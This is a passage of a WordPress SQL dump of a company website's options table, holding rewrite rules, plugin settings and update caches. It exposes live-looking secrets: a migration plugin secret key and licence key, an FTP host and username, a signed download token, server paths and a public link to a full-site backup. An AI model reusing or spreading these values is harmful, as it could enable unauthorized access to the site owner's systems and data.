matches[1]&feed=$matches[2]";s:53:"featured_item_tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:56:"index.php?featured_item_tag=$matches[1]&feed=$matches[2]";s:34:"featured_item_tag/([^/]+)/embed/?$";s:50:"index.php?featured_item_tag=$matches[1]&embed=true";s:46:"featured_item_tag/([^/]+)/page/?([0-9]{1,})/?$";s:57:"index.php?featured_item_tag=$matches[1]&paged=$matches[2]";s:28:"featured_item_tag/([^/]+)/?$";s:39:"index.php?featured_item_tag=$matches[1]";s:36:"sidebars/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:46:"sidebars/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:66:"sidebars/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:61:"sidebars/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:61:"sidebars/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:42:"sidebars/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:25:"sidebars/([^/]+)/embed/?$";s:40:"index.php?sidebar=$matches[1]&embed=true";s:29:"sidebars/([^/]+)/trackback/?$";s:34:"index.php?sidebar=$matches[1]&tb=1";s:49:"sidebars/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:46:"index.php?sidebar=$matches[1]&feed=$matches[2]";s:44:"sidebars/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:46:"index.php?sidebar=$matches[1]&feed=$matches[2]";s:37:"sidebars/([^/]+)/page/?([0-9]{1,})/?$";s:47:"index.php?sidebar=$matches[1]&paged=$matches[2]";s:44:"sidebars/([^/]+)/comment-page-([0-9]{1,})/?$";s:47:"index.php?sidebar=$matches[1]&cpage=$matches[2]";s:34:"sidebars/([^/]+)/wc-api(/(.*))?/?$";s:48:"index.php?sidebar=$matches[1]&wc-api=$matches[3]";s:40:"sidebars/[^/]+/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:51:"sidebars/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:33:"sidebars/([^/]+)(?:/([0-9]+))?/?$";s:46:"index.php?sidebar=$matches[1]&page=$matches[2]";s:25:"sidebars/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:35:"sidebars/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:55:"sidebars/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:50:"sidebars/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:50:"sidebars/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:31:"sidebars/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:12:"robots\\.txt$";s:18:"index.php?robots=1";s:48:".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$";s:18:"index.php?feed=old";s:20:".*wp-app\\.php(/.*)?$";s:19:"index.php?error=403";s:18:".*wp-register.php$";s:23:"index.php?register=true";s:32:"feed/(feed|rdf|rss|rss2|atom)/?$";s:27:"index.php?&feed=$matches[1]";s:27:"(feed|rdf|rss|rss2|atom)/?$";s:27:"index.php?&feed=$matches[1]";s:8:"embed/?$";s:21:"index.php?&embed=true";s:20:"page/?([0-9]{1,})/?$";s:28:"index.php?&paged=$matches[1]";s:27:"comment-page-([0-9]{1,})/?$";s:39:"index.php?&page_id=64&cpage=$matches[1]";s:17:"wc-api(/(.*))?/?$";s:29:"index.php?&wc-api=$matches[2]";s:41:"comments/feed/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?&feed=$matches[1]&withcomments=1";s:36:"comments/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?&feed=$matches[1]&withcomments=1";s:17:"comments/embed/?$";s:21:"index.php?&embed=true";s:26:"comments/wc-api(/(.*))?/?$";s:29:"index.php?&wc-api=$matches[2]";s:44:"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:40:"index.php?s=$matches[1]&feed=$matches[2]";s:39:"search/(.+)/(feed|rdf|rss|rss2|atom)/?$";s:40:"index.php?s=$matches[1]&feed=$matches[2]";s:20:"search/(.+)/embed/?$";s:34:"index.php?s=$matches[1]&embed=true";s:32:"search/(.+)/page/?([0-9]{1,})/?$";s:41:"index.php?s=$matches[1]&paged=$matches[2]";s:29:"search/(.+)/wc-api(/(.*))?/?$";s:42:"index.php?s=$matches[1]&wc-api=$matches[3]";s:14:"search/(.+)/?$";s:23:"index.php?s=$matches[1]";s:47:"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?author_name=$matches[1]&feed=$matches[2]";s:42:"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?author_name=$matches[1]&feed=$matches[2]";s:23:"author/([^/]+)/embed/?$";s:44:"index.php?author_name=$matches[1]&embed=true";s:35:"author/([^/]+)/page/?([0-9]{1,})/?$";s:51:"index.php?author_name=$matches[1]&paged=$matches[2]";s:32:"author/([^/]+)/wc-api(/(.*))?/?$";s:52:"index.php?author_name=$matches[1]&wc-api=$matches[3]";s:17:"author/([^/]+)/?$";s:33:"index.php?author_name=$matches[1]";s:69:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$";s:80:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]";s:64:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$";s:80:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]";s:45:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$";s:74:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true";s:57:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$";s:81:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]";s:54:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/wc-api(/(.*))?/?$";s:82:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&wc-api=$matches[5]";s:39:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$";s:63:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]";s:56:"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$";s:64:"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]";s:51:"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$";s:64:"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]";s:32:"([0-9]{4})/([0-9]{1,2})/embed/?$";s:58:"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true";s:44:"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$";s:65:"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]";s:41:"([0-9]{4})/([0-9]{1,2})/wc-api(/(.*))?/?$";s:66:"index.php?year=$matches[1]&monthnum=$matches[2]&wc-api=$matches[4]";s:26:"([0-9]{4})/([0-9]{1,2})/?$";s:47:"index.php?year=$matches[1]&monthnum=$matches[2]";s:43:"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?year=$matches[1]&feed=$matches[2]";s:38:"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?year=$matches[1]&feed=$matches[2]";s:19:"([0-9]{4})/embed/?$";s:37:"index.php?year=$matches[1]&embed=true";s:31:"([0-9]{4})/page/?([0-9]{1,})/?$";s:44:"index.php?year=$matches[1]&paged=$matches[2]";s:28:"([0-9]{4})/wc-api(/(.*))?/?$";s:45:"index.php?year=$matches[1]&wc-api=$matches[3]";s:13:"([0-9]{4})/?$";s:26:"index.php?year=$matches[1]";s:27:".?.+?/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:37:".?.+?/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:57:".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:33:".?.+?/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:16:"(.?.+?)/embed/?$";s:41:"index.php?pagename=$matches[1]&embed=true";s:20:"(.?.+?)/trackback/?$";s:35:"index.php?pagename=$matches[1]&tb=1";s:40:"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:47:"index.php?pagename=$matches[1]&feed=$matches[2]";s:35:"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$";s:47:"index.php?pagename=$matches[1]&feed=$matches[2]";s:28:"(.?.+?)/page/?([0-9]{1,})/?$";s:48:"index.php?pagename=$matches[1]&paged=$matches[2]";s:35:"(.?.+?)/comment-page-([0-9]{1,})/?$";s:48:"index.php?pagename=$matches[1]&cpage=$matches[2]";s:25:"(.?.+?)/wc-api(/(.*))?/?$";s:49:"index.php?pagename=$matches[1]&wc-api=$matches[3]";s:28:"(.?.+?)/order-pay(/(.*))?/?$";s:52:"index.php?pagename=$matches[1]&order-pay=$matches[3]";s:33:"(.?.+?)/order-received(/(.*))?/?$";s:57:"index.php?pagename=$matches[1]&order-received=$matches[3]";s:31:"(.?.+?)/edit-account(/(.*))?/?$";s:55:"index.php?pagename=$matches[1]&edit-account=$matches[3]";s:31:"(.?.+?)/edit-address(/(.*))?/?$";s:55:"index.php?pagename=$matches[1]&edit-address=$matches[3]";s:32:"(.?.+?)/lost-password(/(.*))?/?$";s:56:"index.php?pagename=$matches[1]&lost-password=$matches[3]";s:34:"(.?.+?)/customer-logout(/(.*))?/?$";s:58:"index.php?pagename=$matches[1]&customer-logout=$matches[3]";s:37:"(.?.+?)/add-payment-method(/(.*))?/?$";s:61:"index.php?pagename=$matches[1]&add-payment-method=$matches[3]";s:40:"(.?.+?)/delete-payment-method(/(.*))?/?$";s:64:"index.php?pagename=$matches[1]&delete-payment-method=$matches[3]";s:45:"(.?.+?)/set-default-payment-method(/(.*))?/?$";s:69:"index.php?pagename=$matches[1]&set-default-payment-method=$matches[3]";s:31:".?.+?/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:42:".?.+?/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:24:"(.?.+?)(?:/([0-9]+))?/?$";s:47:"index.php?pagename=$matches[1]&page=$matches[2]";s:27:"[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:37:"[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:57:"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:33:"[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:16:"([^/]+)/embed/?$";s:37:"index.php?name=$matches[1]&embed=true";s:20:"([^/]+)/trackback/?$";s:31:"index.php?name=$matches[1]&tb=1";s:40:"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?name=$matches[1]&feed=$matches[2]";s:35:"([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?name=$matches[1]&feed=$matches[2]";s:28:"([^/]+)/page/?([0-9]{1,})/?$";s:44:"index.php?name=$matches[1]&paged=$matches[2]";s:35:"([^/]+)/comment-page-([0-9]{1,})/?$";s:44:"index.php?name=$matches[1]&cpage=$matches[2]";s:25:"([^/]+)/wc-api(/(.*))?/?$";s:45:"index.php?name=$matches[1]&wc-api=$matches[3]";s:31:"[^/]+/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:42:"[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$";s:51:"index.php?attachment=$matches[1]&wc-api=$matches[3]";s:24:"([^/]+)(?:/([0-9]+))?/?$";s:43:"index.php?name=$matches[1]&page=$matches[2]";s:16:"[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:26:"[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:46:"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:41:"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:41:"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:22:"[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";}', 'yes'); 
INSERT INTO `wp_options` VALUES (287232, 'wpseo_sitemap_2442_cache_validator', 'mZHY', 'no'); 
INSERT INTO `wp_options` VALUES (289827, 'wpseo_sitemap_2450_cache_validator', '55bIG', 'no'); 
INSERT INTO `wp_options` VALUES (295557, 'wpseo_sitemap_2474_cache_validator', '5WSIX', 'no'); 
INSERT INTO `wp_options` VALUES (311212, 'wpseo_sitemap_2503_cache_validator', '57has', 'no'); 
INSERT INTO `wp_options` VALUES (315812, 'wpseo_sitemap_2507_cache_validator', '5Vck4', 'no'); 
INSERT INTO `wp_options` VALUES (333753, 'wpseo_sitemap_2552_cache_validator', '4TvPs', 'no'); 
INSERT INTO `wp_options` VALUES (352893, 'wpseo_sitemap_2618_cache_validator', '517pV', 'no'); 
INSERT INTO `wp_options` VALUES (366784, 'pc_google_analytics_version', '1.0.0', 'yes'); 
INSERT INTO `wp_options` VALUES (366787, 'pcga_google_analytics_id', 'UA-85712101-1', 'yes'); 
INSERT INTO `wp_options` VALUES (366788, 'pcga_disable_tracking', '', 'yes'); 
INSERT INTO `wp_options` VALUES (366789, 'pcga_exclude_users', 'a:4:{i:0;s:13:"administrator";i:1;s:6:"author";i:2;s:11:"contributor";i:3;s:6:"editor";}', 'yes'); 
INSERT INTO `wp_options` VALUES (380050, 'wpseo_sitemap_1692_cache_validator', '5YJ8a', 'no'); 
INSERT INTO `wp_options` VALUES (420888, 'ai1wm_secret_key', 'kwxTj3mJXqGL', 'yes'); 
INSERT INTO `wp_options` VALUES (421313, 'updraftplus-addons_options', 'a:1:{s:5:"email";s:21:"srobertson@mschem.com";}', 'no'); 
INSERT INTO `wp_options` VALUES (421322, 'external_updates-updraftplus', 'O:8:"stdClass":3:{s:9:"lastCheck";i:1478253053;s:14:"checkedVersion";s:9:"2.12.23.1";s:6:"update";O:8:"stdClass":8:{s:2:"id";i:0;s:4:"slug";s:11:"updraftplus";s:7:"version";s:9:"2.12.23.1";s:8:"homepage";s:23:"https://updraftplus.com";s:12:"download_url";s:323:"https://updraftplus.com/?udm_action=download&slug=updraftplus&muid=1&etoken=DNumF1NB7Q1Ubi9MqNLmWeFC87q12QtKNpGQ8TGGjAmgmJl%2BrDZmDsInT3XYNbd%2BwjH%2B6hQDANv6c%2B%2F3OCitEYUuHhHdMbOrT1GhepVepRb0X5KYoB7%2FeYLhyxsr3QBQTGXEy3MqfE2lvQCA52spMvtY8NQaGVjm9hQTIZo13u%2B0SzHG4qswQI7UbyR3Ma2wQSCGIEULWb9B8svai6NDYA%3D%3D&ig=/b335cf1f";s:14:"upgrade_notice";N;s:8:"filename";s:27:"updraftplus/updraftplus.php";s:24:"x-spm-yourversion-tested";s:3:"4.6";}}', 'no'); 
INSERT INTO `wp_options` VALUES (430963, 'duplicator_settings', 'a:11:{s:7:"version";s:6:"1.1.18";s:18:"uninstall_settings";s:1:"1";s:15:"uninstall_files";s:1:"1";s:16:"uninstall_tables";s:1:"0";s:13:"package_debug";s:1:"0";s:17:"package_mysqldump";s:1:"1";s:22:"package_mysqldump_path";s:0:"";s:24:"package_phpdump_qrylimit";s:3:"100";s:17:"package_zip_flush";s:1:"0";s:20:"storage_htaccess_off";s:1:"0";s:17:"wpfront_integrate";s:1:"0";}', 'yes'); 
INSERT INTO `wp_options` VALUES (430964, 'duplicator_version_plugin', '1.1.18', 'yes'); 
INSERT INTO `wp_options` VALUES (430991, 'duplicator_ui_view_state', 'a:3:{s:22:"dup-pack-storage-panel";s:1:"1";s:22:"dup-pack-archive-panel";s:1:"1";s:24:"dup-pack-installer-panel";s:1:"1";}', 'yes'); 
INSERT INTO `wp_options` VALUES (430992, 'duplicator_package_active', 'O:11:"DUP_Package":23:{s:7:"Created";s:19:"2016-10-20 11:53:29";s:7:"Version";s:6:"1.1.18";s:9:"VersionWP";s:5:"4.6.1";s:9:"VersionDB";s:6:"5.5.43";s:10:"VersionPHP";s:6:"5.4.42";s:9:"VersionOS";s:5:"Linux";s:2:"ID";N;s:4:"Name";s:34:"20161020_millerstephensonchemicals";s:4:"Hash";s:29:"5808b0396e3dc6428161020115329";s:8:"NameHash";s:64:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329";s:4:"Type";i:0;s:5:"Notes";s:0:"";s:9:"StorePath";s:67:"/home/content/p3pnexwpnas01_data03/33/3601733/html/wp-snapshots/tmp";s:8:"StoreURL";s:46:"http://www.miller-stephenson.com/wp-snapshots/";s:8:"ScanFile";s:74:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329_scan.json";s:7:"Runtime";N;s:7:"ExeSize";N;s:7:"ZipSize";N;s:6:"Status";N;s:6:"WPUser";N;s:7:"Archive";O:11:"DUP_Archive":13:{s:10:"FilterDirs";s:0:"";s:10:"FilterExts";s:0:"";s:13:"FilterDirsAll";a:0:{}s:13:"FilterExtsAll";a:0:{}s:8:"FilterOn";i:0;s:4:"File";N;s:6:"Format";s:3:"ZIP";s:7:"PackDir";s:50:"/home/content/p3pnexwpnas01_data03/33/3601733/html";s:4:"Size";i:0;s:4:"Dirs";a:0:{}s:5:"Files";a:0:{}s:10:"FilterInfo";O:23:"DUP_Archive_Filter_Info":6:{s:4:"Dirs";O:34:"DUP_Archive_Filter_Scope_Directory":4:{s:7:"Warning";a:0:{}s:10:"Unreadable";a:0:{}s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:5:"Files";O:29:"DUP_Archive_Filter_Scope_File":5:{s:4:"Size";a:0:{}s:7:"Warning";a:0:{}s:10:"Unreadable";a:0:{}s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:4:"Exts";O:29:"DUP_Archive_Filter_Scope_Base":2:{s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:9:"UDirCount";i:0;s:10:"UFileCount";i:0;s:9:"UExtCount";i:0;}s:10:"\0*\0Package";O:11:"DUP_Package":23:{s:7:"Created";s:19:"2016-10-20 11:53:29";s:7:"Version";s:6:"1.1.18";s:9:"VersionWP";s:5:"4.6.1";s:9:"VersionDB";s:6:"5.5.43";s:10:"VersionPHP";s:6:"5.4.42";s:9:"VersionOS";s:5:"Linux";s:2:"ID";N;s:4:"Name";s:34:"20161020_millerstephensonchemicals";s:4:"Hash";s:29:"5808b0396e3dc6428161020115329";s:8:"NameHash";s:64:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329";s:4:"Type";i:0;s:5:"Notes";s:0:"";s:9:"StorePath";s:67:"/home/content/p3pnexwpnas01_data03/33/3601733/html/wp-snapshots/tmp";s:8:"StoreURL";s:46:"http://www.miller-stephenson.com/wp-snapshots/";s:8:"ScanFile";N;s:7:"Runtime";N;s:7:"ExeSize";N;s:7:"ZipSize";N;s:6:"Status";N;s:6:"WPUser";N;s:7:"Archive";r:22;s:9:"Installer";O:13:"DUP_Installer":12:{s:4:"File";N;s:4:"Size";i:0;s:10:"OptsDBHost";s:0:"";s:10:"OptsDBPort";s:0:"";s:10:"OptsDBName";s:0:"";s:10:"OptsDBUser";s:0:"";s:12:"OptsSSLAdmin";i:0;s:12:"OptsSSLLogin";i:0;s:11:"OptsCacheWP";i:0;s:13:"OptsCachePath";i:0;s:10:"OptsURLNew";s:0:"";s:10:"\0*\0Package";r:52;}s:8:"Database";O:12:"DUP_Database":12:{s:4:"Type";s:5:"MySQL";s:4:"Size";N;s:4:"File";N;s:4:"Path";N;s:12:"FilterTables";s:0:"";s:8:"FilterOn";i:0;s:4:"Name";N;s:10:"Compatible";s:0:"";s:10:"\0*\0Package";r:52;s:25:"\0DUP_Database\0dbStorePath";N;s:23:"\0DUP_Database\0EOFMarker";s:0:"";s:26:"\0DUP_Database\0networkFlush";b:0;}}}s:9:"Installer";r:74;s:8:"Database";r:87;}', 'yes'); 
INSERT INTO `wp_options` VALUES (433406, 'wpmove_options', 'a:7:{s:13:"db_chunk_size";i:0;s:13:"fs_chunk_size";i:50;s:12:"ftp_hostname";s:14:"104.238.94.202";s:8:"ftp_port";i:21;s:12:"ftp_username";s:24:"ddillulio@104.238.94.202";s:16:"ftp_passive_mode";i:1;s:15:"ftp_remote_path";s:44:"/ms/wp-content/plugins/wordpress-move/backup";}', 'yes'); 
INSERT INTO `wp_options` VALUES (490294, 'wpseo_sitemap_2694_cache_validator', '4FWdV', 'no'); 
INSERT INTO `wp_options` VALUES (522226, 'wpseo_sitemap_2773_cache_validator', '6ctq7', 'no'); 
INSERT INTO `wp_options` VALUES (565542, '_transient_wc_count_comments', 'O:8:"stdClass":7:{s:14:"total_comments";i:0;s:3:"all";i:0;s:9:"moderated";i:0;s:8:"approved";i:0;s:4:"spam";i:0;s:5:"trash";i:0;s:12:"post-trashed";i:0;}', 'yes'); 
INSERT INTO `wp_options` VALUES (565556, '_site_transient_update_themes', 'O:8:"stdClass":4:{s:12:"last_checked";i:1503385056;s:7:"checked";a:9:{s:14:"flatsome-child";s:3:"3.0";s:18:"flatsome-child_old";s:3:"2.5";s:8:"flatsome";s:6:"3.0.28";s:12:"flatsome_296";s:5:"2.9.6";s:12:"flatsome_bad";s:5:"2.9.6";s:10:"skt-towing";s:3:"1.7";s:13:"twentyfifteen";s:3:"1.6";s:14:"twentyfourteen";s:3:"1.8";s:13:"twentysixteen";s:3:"1.3";}s:8:"response";a:2:{s:13:"twentyfifteen";a:4:{s:5:"theme";s:13:"twentyfifteen";s:11:"new_version";s:3:"1.8";s:3:"url";s:43:"https://wordpress.org/themes/twentyfifteen/";s:7:"package";s:59:"https://downloads.wordpress.org/theme/twentyfifteen.1.8.zip";}s:14:"twentyfourteen";a:4:{s:5:"theme";s:14:"twentyfourteen";s:11:"new_version";s:3:"2.0";s:3:"url";s:44:"https://wordpress.org/themes/twentyfourteen/";s:7:"package";s:60:"https://downloads.wordpress.org/theme/twentyfourteen.2.0.zip";}}s:12:"translations";a:0:{}}', 'no'); 
INSERT INTO `wp_options` VALUES (573313, '_site_transient_update_core', 'O:8:"stdClass":4:{s:7:"updates";a:4:{i:0;O:8:"stdClass":10:{s:8:"response";s:7:"upgrade";s:8:"download";s:59:"https://downloads.wordpress.org/release/wordpress-4.8.1.zip";s:6:"locale";s:5:"en_US";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:59:"https://downloads.wordpress.org/release/wordpress-4.8.1.zip";s:10:"no_content";s:70:"https://downloads.wordpress.org/release/wordpress-4.8.1-no-content.zip";s:11:"new_bundled";s:71:"https://downloads.wordpress.org/release/wordpress-4.8.1-new-bundled.zip";s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:5:"4.8.1";s:7:"version";s:5:"4.8.1";s:11:"php_version";s:5:"5.2.4";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"4.7";s:15:"partial_version";s:0:"";}i:1;O:8:"stdClass":11:{s:8:"response";s:10:"autoupdate";s:8:"download";s:59:"https://downloads.wordpress.org/release/wordpress-4.8.1.zip";s:6:"locale";s:5:"en_US";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:59:"https://downloads.wordpress.org/release/wordpress-4.8.1.zip";s:10:"no_content";s:70:"https://downloads.wordpress.org/release/wordpress-4.8.1-no-content.zip";s:11:"new_bundled";s:71:"https://downloads.wordpress.org/release/wordpress-4.8.1-new-bundled.zip";s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:5:"4.8.1";s:7:"version";s:5:"4.8.1";s:11:"php_version";s:5:"5.2.4";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"4.7";s:15:"partial_version";s:0:"";s:9:"new_files";s:1:"1";}i:2;O:8:"stdClass":11:{s:8:"response";s:10:"autoupdate";s:8:"download";s:59:"https://downloads.wordpress.org/release/wordpress-4.7.5.zip";s:6:"locale";s:5:"en_US";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:59:"https://downloads.wordpress.org/release/wordpress-4.7.5.zip";s:10:"no_content";s:70:"https://downloads.wordpress.org/release/wordpress-4.7.5-no-content.zip";s:11:"new_bundled";s:71:"https://downloads.wordpress.org/release/wordpress-4.7.5-new-bundled.zip";s:7:"partial";b:0;s:8:"rollback";b:0;}s:7:"current";s:5:"4.7.5";s:7:"version";s:5:"4.7.5";s:11:"php_version";s:5:"5.2.4";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"4.7";s:15:"partial_version";s:0:"";s:9:"new_files";s:1:"1";}i:3;O:8:"stdClass":11:{s:8:"response";s:10:"autoupdate";s:8:"download";s:59:"https://downloads.wordpress.org/release/wordpress-4.6.6.zip";s:6:"locale";s:5:"en_US";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:59:"https://downloads.wordpress.org/release/wordpress-4.6.6.zip";s:10:"no_content";s:70:"https://downloads.wordpress.org/release/wordpress-4.6.6-no-content.zip";s:11:"new_bundled";s:71:"https://downloads.wordpress.org/release/wordpress-4.6.6-new-bundled.zip";s:7:"partial";s:69:"https://downloads.wordpress.org/release/wordpress-4.6.6-partial-1.zip";s:8:"rollback";s:70:"https://downloads.wordpress.org/release/wordpress-4.6.6-rollback-1.zip";}s:7:"current";s:5:"4.6.6";s:7:"version";s:5:"4.6.6";s:11:"php_version";s:5:"5.2.4";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"4.7";s:15:"partial_version";s:5:"4.6.1";s:9:"new_files";s:0:"";}}s:12:"last_checked";i:1503385097;s:15:"version_checked";s:5:"4.6.1";s:12:"translations";a:0:{}}', 'no'); 
INSERT INTO `wp_options` VALUES (573374, '_transient_product-transient-version', '1503410627', 'yes'); 
INSERT INTO `wp_options` VALUES (574009, '_site_transient_timeout_n_nextend581a4de34a5841.86545280', '1478122483', 'no'); 
INSERT INTO `wp_options` VALUES (574010, '_site_transient_n_nextend581a4de34a5841.86545280', '1', 'no'); 
INSERT INTO `wp_options` VALUES (574011, '_site_transient_timeout_nextend581a4de34a5841.86545280_google_r', '1478122483', 'no'); 
INSERT INTO `wp_options` VALUES (574012, '_site_transient_nextend581a4de34a5841.86545280_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (574219, '_site_transient_timeout_gd_system_blacklist', '1478176438', 'no'); 
INSERT INTO `wp_options` VALUES (574220, '_site_transient_gd_system_blacklist', 'a:0:{}', 'no'); 
INSERT INTO `wp_options` VALUES (574221, 'ai1wmue_plugin_key', '8dc39dd7-4bdf-47c2-b6b9-27d54b99c3e1', 'yes'); 
INSERT INTO `wp_options` VALUES (574222, 'ai1wm_status', 'a:3:{s:4:"type";s:8:"download";s:7:"message";s:236:"<a href="https://www.miller-stephenson.com/wp-content/ai1wm-backups/www.miller-stephenson.com-20170228-190702-328.wpress" class="ai1wm-button-green ai1wm-emphasize"><span>Download www.miller-stephenson.com</span><em>Size: 24 GB</em></a>";s:5:"title";N;}', 'yes'); 
